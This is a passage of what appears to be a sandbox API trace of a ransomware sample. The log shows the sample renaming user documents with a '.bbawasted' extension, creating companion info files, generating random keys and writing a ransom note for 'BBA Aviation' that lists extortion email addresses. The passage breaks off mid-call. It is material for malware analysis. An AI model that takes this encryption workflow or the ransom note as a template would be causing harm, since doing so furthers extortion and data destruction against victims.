0x28c [0217.793] WriteFile (in: hFile=0x28c, lpBuffer=0x6bb6f0*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x12ffdfc, lpOverlapped=0x0 | out: lpBuffer=0x6bb6f0*, lpNumberOfBytesWritten=0x12ffdfc*=0xa3a, lpOverlapped=0x0) returned 1 [0217.794] SetEndOfFile (hFile=0x28c) returned 1 [0217.794] SetFilePointer (in: hFile=0x28c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0217.794] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bb6f0 | out: hHeap=0x660000) returned 1 [0217.795] lstrcpyW (in: lpString1=0x6c4bf2, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0217.795] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\FD1HVy\\Documents\\pH3m\\SzVKRvC\\qLI28.pptx" (normalized: "c:\\users\\fd1hvy\\documents\\ph3m\\szvkrvc\\qli28.pptx"), lpNewFileName="\\\\?\\C:\\Users\\FD1HVy\\Documents\\pH3m\\SzVKRvC\\qLI28.pptx.bbawasted" (normalized: "c:\\users\\fd1hvy\\documents\\ph3m\\szvkrvc\\qli28.pptx.bbawasted")) returned 1 [0217.795] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Documents\\pH3m\\SzVKRvC\\qLI28.pptx.bbawasted" (normalized: "c:\\users\\fd1hvy\\documents\\ph3m\\szvkrvc\\qli28.pptx.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x290 [0217.796] CreateFileMappingW (hFile=0x290, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x294 [0217.796] GetFileSize (in: hFile=0x290, lpFileSizeHigh=0x12ffdcc | out: lpFileSizeHigh=0x12ffdcc*=0x0) returned 0x16d2a [0217.796] MapViewOfFile (hFileMappingObject=0x294, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x16d2a) returned 0x5f0000 [0217.796] CloseHandle (hObject=0x290) returned 1 [0217.798] UnmapViewOfFile (lpBaseAddress=0x5f0000) returned 1 [0217.799] CloseHandle (hObject=0x294) returned 1 [0217.799] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x66dd58 [0217.800] CryptAcquireContextW (in: phProv=0x12ffdbc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffdbc*=0x6a6790) returned 1 [0217.800] CryptGenRandom (in: hProv=0x6a6790, dwLen=0x1b8, pbBuffer=0x66dda0 | out: pbBuffer=0x66dda0) returned 1 [0217.800] CryptReleaseContext (hProv=0x6a6790, dwFlags=0x0) returned 1 [0217.800] CryptAcquireContextW (in: phProv=0x12ffb24, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffb24*=0x6a65f8) returned 1 [0217.801] CryptGenRandom (in: hProv=0x6a65f8, dwLen=0x200, pbBuffer=0x12ffb40 | out: pbBuffer=0x12ffb40) returned 1 [0217.801] CryptReleaseContext (hProv=0x6a65f8, dwFlags=0x0) returned 1 [0217.809] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x403) returned 0x6aecf0 [0217.809] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x66dd58 | out: hHeap=0x660000) returned 1 [0217.809] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bb6f0 [0217.809] _snwprintf (in: _Dest=0x6bb6f0, _Count=0x51d, _Format="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]c8Bxc8AHn+ojc5hGeHD2vOEbMC7tihhPvUzcOR6WtxFc6n19qtDF3OX3vAcLDwLQ\r\ngBUNVeyRwes2FtVrWBaYbJIkRp4WCVmv56POGNARq5SVehfiknV+W+IC0c6Ea7H2\r\n+w65PC9AT4291EQWkCR+dGwwtKubXeOsijqweiVRbb+57K8uSaab1dR4oH8JBQ7M\r\nOm2ZUUF86H3b5qBkvi4rxtpLIY9lr9Fp2qGqbs+2BQUaq25UnHTB5xAfh83mxT3F\r\nO5Gmas33aHBZsYBminjWNIDEJFZHYS57/XMEC2E1zYAwfJs4eeNN+Y0LJ1kydWEZ\r\naL6wJZBAtPJToV4LXjIifIApUIoBdykVx5Hr3TIBbsAi8jDzbBaSyrN1O5ttXLON\r\nZ4DxrybkT+zmd2LiJJcbqHxXCmGoFCaFbMEE9bHQUy+dYqONa8cQ+JvlToVKu/FM\r\nsJPbzWDlXiIo/hGpqbkhfYSnmt2Vh45RTyWRnO3fklQ/Y7a02Rq2QzcyAY3/jykB\r\njSn4PxcquJiu9JM+8VYUTMqp/QKK8CC3OHjGxSXS3orSfg7JFWWXKS+VHepGB+PZ\r\ngbYHXj9hLVYjyIjmgmQQWk1Z6njiLzsKxTx33ysgxIN2lNkGJVz5Uv89Ag/cbNFk\r\nUapCa6r86GHVvTCHtoYCHfkUtHJzGkUsPqwdQDu1+se=[end_key]\r\nKEEP IT\r\n") returned 984 [0217.809] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6aecf0 | out: hHeap=0x660000) returned 1 [0217.809] WriteFile (in: hFile=0x28c, lpBuffer=0x6bb6f0*, nNumberOfBytesToWrite=0x7b0, lpNumberOfBytesWritten=0x12ffe30, lpOverlapped=0x0 | out: lpBuffer=0x6bb6f0*, lpNumberOfBytesWritten=0x12ffe30*=0x7b0, lpOverlapped=0x0) returned 1 [0217.810] SetEndOfFile (hFile=0x28c) returned 1 [0217.812] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bb6f0 | out: hHeap=0x660000) returned 1 [0217.812] CloseHandle (hObject=0x28c) returned 1 [0217.812] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6c4b88 | out: hHeap=0x660000) returned 1 [0217.812] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b0650 | out: hHeap=0x660000) returned 1 [0217.812] CryptAcquireContextW (in: phProv=0x12ffe04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffe04*=0x6a62c8) returned 1 [0217.813] CryptGenRandom (in: hProv=0x6a62c8, dwLen=0x48, pbBuffer=0x12ffe40 | out: pbBuffer=0x12ffe40) returned 1 [0217.813] CryptReleaseContext (hProv=0x6a62c8, dwFlags=0x0) returned 1 [0217.813] lstrlenW (lpString="\\\\?\\C:\\Users\\FD1HVy\\Documents\\pH3m\\SzVKRvC\\TTpiovi3qkm6B-jrGgHP.ods") returned 67 [0217.813] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x290) returned 0x6c4b88 [0217.813] lstrcpyW (in: lpString1=0x6c4c0e, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0217.813] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bb6f0 [0217.813] CryptAcquireContextW (in: phProv=0x12ffde0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffde0*=0x6a6c58) returned 1 [0217.814] CryptGenRandom (in: hProv=0x6a6c58, dwLen=0xa3a, pbBuffer=0x6bb6f0 | out: pbBuffer=0x6bb6f0) returned 1 [0217.814] CryptReleaseContext (hProv=0x6a6c58, dwFlags=0x0) returned 1 [0217.814] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Documents\\pH3m\\SzVKRvC\\TTpiovi3qkm6B-jrGgHP.ods.bbawasted_info" (normalized: "c:\\users\\fd1hvy\\documents\\ph3m\\szvkrvc\\ttpiovi3qkm6b-jrgghp.ods.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x28c [0217.814] WriteFile (in: hFile=0x28c, lpBuffer=0x6bb6f0*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x12ffdfc, lpOverlapped=0x0 | out: lpBuffer=0x6bb6f0*, lpNumberOfBytesWritten=0x12ffdfc*=0xa3a, lpOverlapped=0x0) returned 1 [0217.816] SetEndOfFile (hFile=0x28c) returned 1 [0217.816] SetFilePointer (in: hFile=0x28c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0217.816] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bb6f0 | out: hHeap=0x660000) returned 1 [0217.816] lstrcpyW (in: lpString1=0x6c4c0e, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0217.816] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\FD1HVy\\Documents\\pH3m\\SzVKRvC\\TTpiovi3qkm6B-jrGgHP.ods" (normalized: "c:\\users\\fd1hvy\\documents\\ph3m\\szvkrvc\\ttpiovi3qkm6b-jrgghp.ods"), lpNewFileName="\\\\?\\C:\\Users\\FD1HVy\\Documents\\pH3m\\SzVKRvC\\TTpiovi3qkm6B-jrGgHP.ods.bbawasted" (normalized: "c:\\users\\fd1hvy\\documents\\ph3m\\szvkrvc\\ttpiovi3qkm6b-jrgghp.ods.bbawasted")) returned 1 [0217.992] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Documents\\pH3m\\SzVKRvC\\TTpiovi3qkm6B-jrGgHP.ods.bbawasted" (normalized: "c:\\users\\fd1hvy\\documents\\ph3m\\szvkrvc\\ttpiovi3qkm6b-jrgghp.ods.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x294 [0217.992] CreateFileMappingW (hFile=0x294, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x27c [0217.993] GetFileSize (in: hFile=0x294, lpFileSizeHigh=0x12ffdcc | out: lpFileSizeHigh=0x12ffdcc*=0x0) returned 0x8bbe [0217.993] MapViewOfFile (hFileMappingObject=0x27c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x8bbe) returned 0x5f0000 [0217.993] CloseHandle (hObject=0x294) returned 1 [0217.994] UnmapViewOfFile (lpBaseAddress=0x5f0000) returned 1 [0217.995] CloseHandle (hObject=0x27c) returned 1 [0217.995] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x66dd58 [0217.995] CryptAcquireContextW (in: phProv=0x12ffdbc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffdbc*=0x6a60a8) returned 1 [0217.996] CryptGenRandom (in: hProv=0x6a60a8, dwLen=0x1b8, pbBuffer=0x66dda0 | out: pbBuffer=0x66dda0) returned 1 [0217.996] CryptReleaseContext (hProv=0x6a60a8, dwFlags=0x0) returned 1 [0217.996] CryptAcquireContextW (in: phProv=0x12ffb24, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffb24*=0x6a6240) returned 1 [0217.997] CryptGenRandom (in: hProv=0x6a6240, dwLen=0x200, pbBuffer=0x12ffb40 | out: pbBuffer=0x12ffb40) returned 1 [0217.997] CryptReleaseContext (hProv=0x6a6240, dwFlags=0x0) returned 1 [0218.008] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x403) returned 0x6be308 [0218.008] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x66dd58 | out: hHeap=0x660000) returned 1 [0218.008] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bb6f0 [0218.008] _snwprintf (in: _Dest=0x6bb6f0, _Count=0x51d, _Format="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]Xz28yHZVH6v+kSpVoI48g6IahsUgg2n7ZjdVW7bOkruKVNC+J4TKz4TwtciEzG4q\r\nFW/cs5Zr5jn9DI48yv8WyZLPnueUz0kicb5E6oCRueF7JCUV4o661hbo5+m+oVod\r\n/hiHpO7whUB5giAFuVLzZuo5vL7aCUYAzdq31R/sxvJkFmpOSIMrLIyRa517kHac\r\nBmW043w3nVMyNg2VX3WQaC/yQt4iZpwNGJ4T98CfAE/QKzOoVOhXockYOpbRYFpU\r\nmb1atHRVLRL7TsJF2drhx9/F7p+l6hvD1ON5Wez90qvHYQTMo+pEefXsOjFt3Wt9\r\njvAJUZgUrEmbKsvCtKoYkdCKcxIwfsdhFgB2KdwrPimXB736OI/n3ogj5XVUb0xT\r\naua384SEO8RmplOCXI9GdsMM0hm5zS8tu1d1D6gA6zB4l1uP+NI1afwCRx73jyzI\r\nSh/lANkxGnqVOXLyC3UX85fyW455k47/MJ9sfSCGk8GEFKCECE45eNVi079GVdA/\r\n7I/5hMGho4PLPOb2TzK6Rf4t/ToYw8fmpiQXThQpt/bPSVK+rNfd4sAzG+ejB1qm\r\nGGrDrnnmyJ7PkWsHZBBlyzs67IkY/ysg8G0Mc2nnoVTK5skzN+Ezquusb2LYBfJ4\r\ncK2flidxBcK2QcN/adpjCn/7Ij4WyLIdahT9Iv/OlB/=[end_key]\r\nKEEP IT\r\n") returned 984 [0218.008] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6be308 | out: hHeap=0x660000) returned 1 [0218.008] WriteFile (in: hFile=0x28c, lpBuffer=0x6bb6f0*, nNumberOfBytesToWrite=0x7b0, lpNumberOfBytesWritten=0x12ffe30, lpOverlapped=0x0 | out: lpBuffer=0x6bb6f0*, lpNumberOfBytesWritten=0x12ffe30*=0x7b0, lpOverlapped=0x0) returned 1 [0218.008] SetEndOfFile (hFile=0x28c) returned 1 [0218.011] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bb6f0 | out: hHeap=0x660000) returned 1 [0218.011] CloseHandle (hObject=0x28c) returned 1 [0218.011] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6c4b88 | out: hHeap=0x660000) returned 1 [0218.012] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b6860 | out: hHeap=0x660000) returned 1 [0218.012] CryptAcquireContextW (in: phProv=0x12ffe04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffe04*=0x6a6c58) returned 1 [0218.013] CryptGenRandom (in: hProv=0x6a6c58, dwLen=0x48, pbBuffer=0x12ffe40 | out: pbBuffer=0x12ffe40) returned 1 [0218.013] CryptReleaseContext (hProv=0x6a6c58, dwFlags=0x0) returned 1 [0218.013] lstrlenW (lpString="\\\\?\\C:\\Users\\FD1HVy\\Documents\\pH3m\\uOHBmF.ppt") returned 45 [0218.013] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x264) returned 0x6adb18 [0218.013] lstrcpyW (in: lpString1=0x6adb72, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0218.013] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bb6f0 [0218.013] CryptAcquireContextW (in: phProv=0x12ffde0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffde0*=0x6a61b8) returned 1 [0218.014] CryptGenRandom (in: hProv=0x6a61b8, dwLen=0xa3a, pbBuffer=0x6bb6f0 | out: pbBuffer=0x6bb6f0) returned 1 [0218.014] CryptReleaseContext (hProv=0x6a61b8, dwFlags=0x0) returned 1 [0218.014] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Documents\\pH3m\\uOHBmF.ppt.bbawasted_info" (normalized: "c:\\users\\fd1hvy\\documents\\ph3m\\uohbmf.ppt.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x28c [0218.018] WriteFile (in: hFile=0x28c, lpBuffer=0x6bb6f0*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x12ffdfc, lpOverlapped=0x0 | out: lpBuffer=0x6bb6f0*, lpNumberOfBytesWritten=0x12ffdfc*=0xa3a, lpOverlapped=0x0) returned 1 [0218.019] SetEndOfFile (hFile=0x28c) returned 1 [0218.020] SetFilePointer (in: hFile=0x28c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0218.020] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bb6f0 | out: hHeap=0x660000) returned 1 [0218.020] lstrcpyW (in: lpString1=0x6adb72, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0218.020] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\FD1HVy\\Documents\\pH3m\\uOHBmF.ppt" (normalized: "c:\\users\\fd1hvy\\documents\\ph3m\\uohbmf.ppt"), lpNewFileName="\\\\?\\C:\\Users\\FD1HVy\\Documents\\pH3m\\uOHBmF.ppt.bbawasted" (normalized: "c:\\users\\fd1hvy\\documents\\ph3m\\uohbmf.ppt.bbawasted")) returned 1 [0218.021] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Documents\\pH3m\\uOHBmF.ppt.bbawasted" (normalized: "c:\\users\\fd1hvy\\documents\\ph3m\\uohbmf.ppt.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0218.021] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x294 [0218.021] GetFileSize (in: hFile=0x27c, lpFileSizeHigh=0x12ffdcc | out: lpFileSizeHigh=0x12ffdcc*=0x0) returned 0xe856 [0218.021] MapViewOfFile (hFileMappingObject=0x294, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xe856) returned 0x5f0000 [0218.021] CloseHandle (hObject=0x27c) returned 1 [0218.023] UnmapViewOfFile (lpBaseAddress=0x5f0000) returned 1 [0218.024] CloseHandle (hObject=0x294) returned 1 [0218.024] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x689df0 [0218.025] CryptAcquireContextW (in: phProv=0x12ffdbc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffdbc*=0x6a6460) returned 1 [0218.025] CryptGenRandom (in: hProv=0x6a6460, dwLen=0x1b8, pbBuffer=0x689e38 | out: pbBuffer=0x689e38) returned 1 [0218.025] CryptReleaseContext (hProv=0x6a6460, dwFlags=0x0) returned 1 [0218.025] CryptAcquireContextW (in: phProv=0x12ffb24, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffb24*=0x6a6bd0) returned 1 [0218.026] CryptGenRandom (in: hProv=0x6a6bd0, dwLen=0x200, pbBuffer=0x12ffb40 | out: pbBuffer=0x12ffb40) returned 1 [0218.026] CryptReleaseContext (hProv=0x6a6bd0, dwFlags=0x0) returned 1 [0218.037] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x403) returned 0x6c4b88 [0218.037] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x689df0 | out: hHeap=0x660000) returned 1 [0218.037] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bb6f0 [0218.037] _snwprintf (in: _Dest=0x6bb6f0, _Count=0x51d, _Format="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]LH5rTmm+KGlbFdPwfIsYaygheXmFsMfoWyzZMc1lv2O9MghEluu0OFQnW6viZwol\r\nJdU9BTYVUN73iPSrzKz/kB2HAkTVoWF7VIK+FhWXFKcztg791PfyGApDst1/Gqal\r\nMbPZ08VdVmllKk+mbqjBxGLkoykh0wVdw6IMOzopGeRMJR1rGC5PQ8ywHpC5+j5Y\r\nIqVMxnPnjyJHfehFdhBHGP+EMklYNI/985smnLinU128ezkLlIYoETG9O+gX1uBX\r\nIj8r4yM+azKMA/0Odd/Ho06U2Pl6+ps9MF60WX6hA+D3HrQxAjX9ckH6HpaD4PkS\r\n+U+MAv1dT1y7GsW1JF65SaFNIwQCOmqvsW6ZI0B3AHMxvipoRroHkn1WoHQ39jW2\r\nhwNaJQ7XzFcpBh6VxetM1GsJE956nqg7+9LNN43IMTPlbfcBUQrtH5UV1f0rpo/Y\r\nkb2Y6+4F2oB6yf4JIKkZQzPGYg/4gALIW0LfyjdkDwq443/PNPVKj7IVBQIFWdOI\r\nd/UMoNx6IzRPvo2JZKYlOfzZpyK3ygzZq8KUggYl+hcucK7ydcCzoUbwArPSmPuf\r\n3pnour4M78Cu8SZCYFHRovVZzyh+8VK/7mzEu6ZbXRUk9iarU1g3CXoPq4LX5Shu\r\nKu3P0YjSYkXWNTdaFomzVqA6NZCamoUh/VFlfiSfnHC=[end_key]\r\nKEEP IT\r\n") returned 984 [0218.037] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6c4b88 | out: hHeap=0x660000) returned 1 [0218.037] WriteFile (in: hFile=0x28c, lpBuffer=0x6bb6f0*, nNumberOfBytesToWrite=0x7b0, lpNumberOfBytesWritten=0x12ffe30, lpOverlapped=0x0 | out: lpBuffer=0x6bb6f0*, lpNumberOfBytesWritten=0x12ffe30*=0x7b0, lpOverlapped=0x0) returned 1 [0218.038] SetEndOfFile (hFile=0x28c) returned 1 [0218.229] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bb6f0 | out: hHeap=0x660000) returned 1 [0218.229] CloseHandle (hObject=0x28c) returned 1 [0218.229] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6adb18 | out: hHeap=0x660000) returned 1 [0218.230] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6afe88 | out: hHeap=0x660000) returned 1 [0218.230] CryptAcquireContextW (in: phProv=0x12ffe04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffe04*=0x6a6ac0) returned 1 [0218.230] CryptGenRandom (in: hProv=0x6a6ac0, dwLen=0x48, pbBuffer=0x12ffe40 | out: pbBuffer=0x12ffe40) returned 1 [0218.231] CryptReleaseContext (hProv=0x6a6ac0, dwFlags=0x0) returned 1 [0218.231] lstrlenW (lpString="\\\\?\\C:\\Users\\FD1HVy\\Documents\\pH3m\\Zc1nwc-rGYA.ppt") returned 50 [0218.231] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x26e) returned 0x6a21e0 [0218.231] lstrcpyW (in: lpString1=0x6a2244, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0218.231] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bb6f0 [0218.231] CryptAcquireContextW (in: phProv=0x12ffde0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffde0*=0x6a60a8) returned 1 [0218.232] CryptGenRandom (in: hProv=0x6a60a8, dwLen=0xa3a, pbBuffer=0x6bb6f0 | out: pbBuffer=0x6bb6f0) returned 1 [0218.232] CryptReleaseContext (hProv=0x6a60a8, dwFlags=0x0) returned 1 [0218.232] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Documents\\pH3m\\Zc1nwc-rGYA.ppt.bbawasted_info" (normalized: "c:\\users\\fd1hvy\\documents\\ph3m\\zc1nwc-rgya.ppt.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x28c [0218.233] WriteFile (in: hFile=0x28c, lpBuffer=0x6bb6f0*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x12ffdfc, lpOverlapped=0x0 | out: lpBuffer=0x6bb6f0*, lpNumberOfBytesWritten=0x12ffdfc*=0xa3a, lpOverlapped=0x0) returned 1 [0218.235] SetEndOfFile (hFile=0x28c) returned 1 [0218.235] SetFilePointer (in: hFile=0x28c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0218.235] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bb6f0 | out: hHeap=0x660000) returned 1 [0218.235] lstrcpyW (in: lpString1=0x6a2244, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0218.235] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\FD1HVy\\Documents\\pH3m\\Zc1nwc-rGYA.ppt" (normalized: "c:\\users\\fd1hvy\\documents\\ph3m\\zc1nwc-rgya.ppt"), lpNewFileName="\\\\?\\C:\\Users\\FD1HVy\\Documents\\pH3m\\Zc1nwc-rGYA.ppt.bbawasted" (normalized: "c:\\users\\fd1hvy\\documents\\ph3m\\zc1nwc-rgya.ppt.bbawasted")) returned 1 [0218.237] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Documents\\pH3m\\Zc1nwc-rGYA.ppt.bbawasted" (normalized: "c:\\users\\fd1hvy\\documents\\ph3m\\zc1nwc-rgya.ppt.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x280 [0218.237] CreateFileMappingW (hFile=0x280, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x27c [0218.237] GetFileSize (in: hFile=0x280, lpFileSizeHigh=0x12ffdcc | out: lpFileSizeHigh=0x12ffdcc*=0x0) returned 0x973e [0218.237] MapViewOfFile (hFileMappingObject=0x27c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x973e) returned 0x5f0000 [0218.237] CloseHandle (hObject=0x280) returned 1 [0218.239] UnmapViewOfFile (lpBaseAddress=0x5f0000) returned 1 [0218.240] CloseHandle (hObject=0x27c) returned 1 [0218.240] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 